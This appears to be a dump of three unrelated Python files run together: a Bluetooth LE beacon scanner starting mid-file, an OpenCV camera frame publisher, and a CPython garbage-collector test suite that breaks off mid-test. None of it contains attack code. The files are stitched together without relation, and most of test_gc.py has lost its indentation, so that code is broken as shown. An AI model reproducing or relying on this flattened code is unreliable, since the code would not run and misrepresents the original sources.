        return self.__dict__
class beacontools:
    # NOTE(review): the imports are deliberately placed in the class body,
    # making the modules class attributes accessed as ``self.sys`` etc.
    import sys
    import struct
    import bluetooth._bluetooth as bluez
    from multiprocessing import Process, Queue
    import time

    # Bluetooth HCI opcode group / command for toggling LE scanning.
    OGF_LE_CTL = 0x08
    OCF_LE_SET_SCAN_ENABLE = 0x000C
    # iBeacons seen during the current scan window, keyed by UUID.
    BEACONs_SCANNED = dict()

    def __init__(self, dev_id, time_use):
        # Background process that scans continuously and publishes a batch
        # of beacons onto ``self.queue`` every ``time_use`` seconds.
        self.proc = self.Process(target=self.__continue_process)
        self.time_use = time_use
        try:
            self.sock = self.bluez.hci_open_dev(dev_id)
            print("\n *** Looking for BLE Beacons ***\n")
        except:
            # Keep a None socket so later calls degrade to no-ops.
            self.sock = None
            print("Error accessing bluetooth")
        self.queue = self.Queue()

    def hci_enable_le_scan(self):
        if self.sock is not None:
            self.hci_toggle_le_scan(0x01)

    def hci_disable_le_scan(self):
        if self.sock is not None:
            self.hci_toggle_le_scan(0x00)

    def hci_toggle_le_scan(self, enable):
        # Sends the LE_SET_SCAN_ENABLE HCI command; 0x01 starts, 0x00 stops.
        if self.sock is not None:
            cmd_pkt = self.struct.pack("<BB", enable, 0x00)
            self.bluez.hci_send_cmd(self.sock, self.OGF_LE_CTL, self.OCF_LE_SET_SCAN_ENABLE, cmd_pkt)

    def packetToString(self, packet):
        """
        Returns the string representation of a raw HCI packet.
        """
        if self.sys.version_info > (3, 0):
            return ''.join('%02x' % self.struct.unpack("B", bytes([x]))[0] for x in packet)
        else:
            return ''.join('%02x' % self.struct.unpack("B", x)[0] for x in packet)

    def parse_events(self, loop_count=100):
        # ``prefix`` is shared at module level for Eddystone URL expansion.
        global prefix
        if self.sock is not None:
            # old_filter = self.sock.getsockopt( self.bluez.SOL_HCI, self.bluez.HCI_FILTER, 14)
            flt = self.bluez.hci_filter_new()
            self.bluez.hci_filter_all_events(flt)
            self.bluez.hci_filter_set_ptype(flt, self.bluez.HCI_EVENT_PKT)
            self.sock.setsockopt(self.bluez.SOL_HCI, self.bluez.HCI_FILTER, flt)
            results = []
            for i in range(0, loop_count):
                packet = self.sock.recv(255)
                # ptype, event, plen = self.struct.unpack("BBB", packet[:3])
                packetOffset = 0
                dataString = self.packetToString(packet)
                """
                If the bluetooth device is an beacon then show the beacon.
                """
                # print (dataString)
                # Eddystone frames advertise the 0xFEAA service UUID.
                if (dataString[34:42] == '0303aafe') and (dataString[44:50] == '16AAFE'):
                    """
                    Selects parts of the bluetooth packets.
                    """
                    broadcastType = dataString[50:52]
                    if broadcastType == '00':
                        type = "Eddystone UID"
                        namespace = dataString[54:74].upper()
                        instance = dataString[74:86].upper()
                        resultsArray = [
                            {"type": type, "namespace": namespace, "instance": instance}]
                        return resultsArray
                    elif broadcastType == '10':
                        type = "Eddystone URL"
                        # The first payload byte encodes a URL scheme prefix.
                        urlprefix = dataString[54:56]
                        if urlprefix == '00':
                            prefix = 'http://www.'
                        elif urlprefix == '01':
                            prefix = 'https://www.'
                        elif urlprefix == '02':
                            prefix = 'http://'
                        elif urlprefix == '03':
                            prefix = 'https://'
                        hexUrl = dataString[56:][:-2]
                        if self.sys.version_info[0] == 3:
                            url = prefix + bytes.fromhex(hexUrl).decode('utf-8')
                            rssi, = self.struct.unpack("b", bytes([packet[packetOffset - 1]]))
                        else:
                            url = prefix + hexUrl.decode("hex")
                            rssi, = self.struct.unpack("b", packet[packetOffset - 1])
                        resultsArray = [{"type": type, "url": url}]
                        return resultsArray
                    elif broadcastType == '20':
                        type = "Eddystone TLM"
                        resultsArray = [{"type": type}]
                        return resultsArray
                    elif broadcastType == '30':
                        type = "Eddystone EID"
                        resultsArray = [{"type": type}]
                        return resultsArray
                    elif broadcastType == '40':
                        type = "Eddystone RESERVED"
                        resultsArray = [{"type": type}]
                        return resultsArray
                # Apple's manufacturer data header marks an iBeacon frame.
                if dataString[38:46] == '4c000215':
                    """
                    Selects parts of the bluetooth packets.
                    """
                    type = "iBeacon"
                    uuid = dataString[46:54] + "-" + dataString[54:58] + "-" + dataString[58:62] + "-" + dataString[
                        62:66] + "-" + dataString[
                        66:78]
                    major = dataString[78:82]
                    minor = dataString[82:86]
                    majorVal = int("".join(major.split()[::-1]), 16)
                    minorVal = int("".join(minor.split()[::-1]), 16)
                    """
                    Organises Mac Address to display properly
                    """
                    scrambledAddress = dataString[14:26]
                    fixStructure = iter(
                        "".join(reversed([scrambledAddress[i:i + 2] for i in range(0, len(scrambledAddress), 2)])))
                    macAddress = ':'.join(a + b for a, b in zip(fixStructure, fixStructure))
                    if self.sys.version_info[0] == 3:
                        rssi, = self.struct.unpack("b", bytes([packet[packetOffset - 1]]))
                    else:
                        rssi, = self.struct.unpack("b", packet[packetOffset - 1])
                    resultsArray = [{"type": type, "uuid": uuid, "major": majorVal, "minor": minorVal, "rssi": rssi,
                                     "macAddress": macAddress}]
                    # Record each beacon for the periodic queue publication.
                    for item in resultsArray:
                        beacon = Beacon_Obj(item['macAddress'], item['rssi'], item['uuid'], 0, item['major'],
                                            item['minor'], item['type'], item['uuid'][0:8])
                        self.BEACONs_SCANNED[beacon.uuid] = beacon
                    return resultsArray
            return results
        return []

    def __continue_process(self):
        # Runs in the child process: scan continuously; every ``time_use``
        # seconds push the accumulated beacons and start a new window.
        self.time_sleep = self.time.time()
        while True:
            self.parse_events(10)
            self.time.sleep(0.25)
            if (int(abs(self.time_sleep - self.time.time()) * 100) / 100) >= self.time_use:
                self.queue.put(self.BEACONs_SCANNED)
                self.BEACONs_SCANNED = dict()
                self.time_sleep = self.time.time()

    def start_continue_process(self):
        self.hci_enable_le_scan()
        self.proc.start()

    def detener_continue_process(self):
        # "detener" = Spanish for "stop": kill and reap the scan process.
        self.proc.terminate()
        self.proc.join()

    def get_beacons(self):
        # Non-blocking: returns the latest published batch, or empty dict.
        if not self.queue.empty():
            return self.queue.get()
        else:
            return dict()
"""
Proceso
"""
class Process_beacon_scan(object):
    """Drives a continuous beacon scan and periodically prints results."""

    def __init__(self):
        self.scan_beacon = beacontools(0, TIME_SCAN)

    def main_beacon_scan(self):
        """Poll the scanner every TIME_SCAN seconds and print each batch.

        BUGFIX: the original ended with ``scan_beacon.detener_continue_process()``
        placed after the infinite loop - unreachable, and referencing an
        undefined name (missing ``self.``). The stop call now lives in a
        ``finally`` block so the scanner process is terminated if the loop
        is ever interrupted.
        """
        import json
        import time
        self.scan_beacon.start_continue_process()
        FOLDER = "/home/Beacon/"
        try:
            while True:
                BEACONS = self.scan_beacon.get_beacons()
                OBJ = dict()
                for key, beacon_class in BEACONS.items():
                    OBJ[key] = beacon_class.getJson()
                    print(beacon_class.getJson())
                print("Escaneando")
                print(OBJ)
                #with open(FOLDER + NAME_FILE_BEACON, 'w') as outfile:
                #    json.dump(OBJ, outfile)
                time.sleep(TIME_SCAN)
        finally:
            self.scan_beacon.detener_continue_process()
"""
Ejecutor unico para que solo se ejecute en este archivo
"""
if __name__ == '__main__':
    # Entry point: build the scanner and run the endless scan/print loop.
    Process_beacon_scan().main_beacon_scan()
|
opencv.py | """
Log video stream provided by OpenCV camera
"""
import cv2
from threading import Thread
class LogOpenCVCamera:
    """Publish JPEG-encoded frames from an OpenCV camera onto the bus.

    Config keys:
      - 'port': OpenCV capture device index (defaults to 0)
      - 'sleep': optional delay between frames, in bus-time seconds
    """

    def __init__(self, config, bus):
        self.input_thread = Thread(target=self.run_input, daemon=True)
        self.bus = bus
        bus.register('raw')
        self.cap = cv2.VideoCapture(config.get('port', 0))
        self.sleep = config.get('sleep')

    def start(self):
        self.input_thread.start()

    def join(self, timeout=None):
        self.input_thread.join(timeout=timeout)

    def run_input(self):
        """Grab frames until the bus shuts down, publishing JPEG bytes."""
        while self.bus.is_alive():
            ok, frame = self.cap.read()
            if ok:
                _, encoded = cv2.imencode('*.jpeg', frame)
                if len(encoded) > 0:
                    self.bus.publish('raw', encoded.tobytes())
            if self.sleep is not None:
                self.bus.sleep(self.sleep)
        self.cap.release()

    def request_stop(self):
        self.bus.shutdown()
# vim: expandtab sw=4 ts=4
|
test_gc.py | import unittest
from test.support import (verbose, refcount_test, run_unittest,
strip_python_stderr, cpython_only, start_threads)
from test.script_helper import assert_python_ok, make_script, temp_dir
import sys
import time
import gc
import weakref
try:
    import threading
except ImportError:
    # Builds without thread support: tests that need threading check for
    # None and skip themselves.
    threading = None
try:
    from _testcapi import with_tp_del
except ImportError:
    def with_tp_del(cls):
        # Fallback when _testcapi is unavailable: produce a class whose
        # instantiation fails loudly instead of silently skipping tp_del.
        class C(object):
            def __new__(cls, *args, **kwargs):
                raise TypeError('requires _testcapi.with_tp_del')
        return C
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
    """Helper with a deliberate self-loop: instances become cyclic trash."""

    def __init__(self, i):
        self.i = i
        # The self-reference puts every instance in a reference cycle, so
        # it can only be reclaimed by the cyclic garbage collector.
        self.loop = self
class GC_Detector(object):
    """Flags when a cyclic garbage collection has run.

    After constructing an instance I, ``I.gc_happened`` remains False
    until gc next collects cyclic trash.
    """

    def __init__(self):
        self.gc_happened = False

        def it_happened(ignored):
            self.gc_happened = True

        # Cyclic trash whose weakref callback fires when gc reclaims it.
        self.wr = weakref.ref(C1055820(666), it_happened)
@with_tp_del
class Uncollectable(object):
    """Create a reference cycle with multiple __del__ methods.

    An object in a reference cycle will never have zero references,
    and so must be garbage collected. If one or more objects in the
    cycle have __del__ methods, the gc refuses to guess an order,
    and leaves the cycle uncollected."""
    def __init__(self, partner=None):
        if partner is None:
            # No partner supplied: build one that points back at us,
            # closing a two-object cycle.
            self.partner = Uncollectable(partner=self)
        else:
            self.partner = partner
    def __tp_del__(self):
        # Legacy finalizer (installed by with_tp_del); its mere presence
        # makes the cycle uncollectable on CPython.
        pass
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertFalse(gc.is_tracked(UserClassSlots()))
self.assertFalse(gc.is_tracked(UserFloatSlots()))
self.assertFalse(gc.is_tracked(UserIntSlots()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout.strip(), b"")
return strip_python_stderr(stderr)
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
import weakref
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
import weakref
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncolectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
